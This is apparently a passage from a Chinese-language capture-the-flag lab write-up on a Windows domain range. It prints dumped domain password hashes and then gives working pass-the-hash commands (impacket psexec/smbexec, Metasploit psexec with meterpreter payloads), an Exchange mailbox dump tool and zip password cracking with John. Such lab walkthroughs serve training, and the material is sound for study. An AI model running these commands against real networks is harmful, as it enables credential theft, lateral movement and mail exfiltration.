[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.2:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.3.2:49667  ...  OK
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:42f51f9c4b7e0cd90f4c34fea8a202d8:::
xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:36f432a5d2b2754167986ee5973d003f:::
xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131:::
xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d:::
xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f:::
xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0:::
xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21:::
xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899:::
xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66:::
xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb:::
xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102:::
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::
Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::
XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:f4e293923315dbf505c2e33aefc92cca:::
XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:766a276a053f370d92eaf25c243f1124:::
XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:57945839978ad251d75c5a8f4196472a:::
[*] Cleaning up... 
                      

拿到域管hash，那我们接下来就可以随意横向了

proxychains impacket-psexec administrator@172.22.3.2 -hashes ':7acbc09a6c0efd81bfa7d5a1d4238beb' -codec gbk
# 或者
use exploit/windows/smb/psexec
set RHOSTS 172.22.3.2
set SMBUser administrator
set SMBPass 00000000000000000000000000000000:7acbc09a6c0efd81bfa7d5a1d4238beb
set SMBDomain xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54526
run

# 拿flag
type c:\Users\Administrator\flag\flag.txt
____  ___.___   _____   ________ __________    _____    _______    ________ 
\   \/  /|   | /  _  \  \_____  \\______   \  /  _  \   \      \  /  _____/ 
 \     / |   |/  /_\  \  /   |   \|       _/ /  /_\  \  /   |   \/   \  ___ 
 /     \ |   /    |    \/    |    \    |   \/    |    \/    |    \    \_\  \
/___/\  \|___\____|__  /\_______  /____|_  /\____|__  /\____|__  /\______  /
      \_/            \/         \/       \/         \/         \/        \/ 

flag04: flag{6aecb4b9-02a1-45be-bdfd-e1d7db8d6de8}

flag3

还剩一个flag，应该在26那台机器上

接下来横向去26拿flag3

proxychains4 impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -dc-ip 172.22.3.2

use C$
cd /users/lumia/desktop

psexec去PTH失败了，smbexec可以

# 不行
proxychains4 impacket-psexec xiaorang.lab/administrator@172.22.3.26 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2 -debug
-codec gbk、-codec default 或 -debug都不行
# 也不行
use exploit/windows/smb/smbexec
set RHOSTS 172.22.3.26
set SMBUser administrator
set SMBPass 00000000000000000000000000000000:7acbc09a6c0efd81bfa7d5a1d4238beb
set SMBDomain xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54528
run

# 这个可以
proxychains4 impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -codec gbk

impacket-psexec和 impacket-smbexec虽然都能用 hash 登录 Windows，但实现原理不同：

• psexec 用的是在目标主机上创建服务（需要能写入 ADMIN$ 共享，且目标主机策略允许），有些环境（如安全策略、杀软、端口策略）会阻止新服务创建或 ADMIN$ 写入。
• smbexec 用的是远程调用命令，不需要在目标上新建服务，权限和策略要求低，兼容性好。

在C:\users\lumia\desktop找到一个secret.zip，我们把它get下来

secret.zip里面有个flag.docx，但是secret.zip需要密码

dump邮件

这里要利用第二次拿到的lumia的hash，将outlook中的邮件下载下来

# 使用这个工具dump邮件
git clone https://github.com/Jumbo-WJB/PTH_Exchange.git

proxychains4 python3 pthexchange.py --target https://172.22.3.9 --username Lumia --password "00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296" --action Download

拿到两封邮件（可以用网易邮箱打开）：

第一封附件是刚刚的secret.zip，提示说用手机号解密；

第二封邮件中附件是一堆名字和手机号

字典爆破

我们用手机号作为字典进行爆破

cat item-1-phone\ lists.csv | grep -Po ',\d+' | sed 's/,//' > num.txt
zip2john item-0-secret.zip >aaa
john aaa --wordlist=num.txt


# 结果如下
┌──(matrix㉿matrix)-[~/Desktop/PTH_Exchange/output]
└─$ cat item-1-phone\ lists.csv | grep -Po ',\d+' | sed 's/,//' > num.txt                                   
┌──(matrix㉿matrix)-[~/Desktop/PTH_Exchange/output]
└─$ zip2john item-0-secret.zip >aaa
ver 2.0 item-0-secret.zip/flag.docx PKZIP Encr: cmplen=668284, decmplen=671056, crc=AFEF0968 ts=AB91 cs=afef type=8                                   
┌──(matrix㉿matrix)-[~/Desktop/PTH_Exchange/output]
└─$ john aaa --wordlist=num.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
18763918468      (item-0-secret.zip/flag.docx)     
1g 0:00:00:00 DONE (2025-08-16 00:13) 100.0g/s 50000p/s 50000c/s 50000C/s 15265180637..15989600577
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

爆出密码是18763918468，解压缩，拿到flag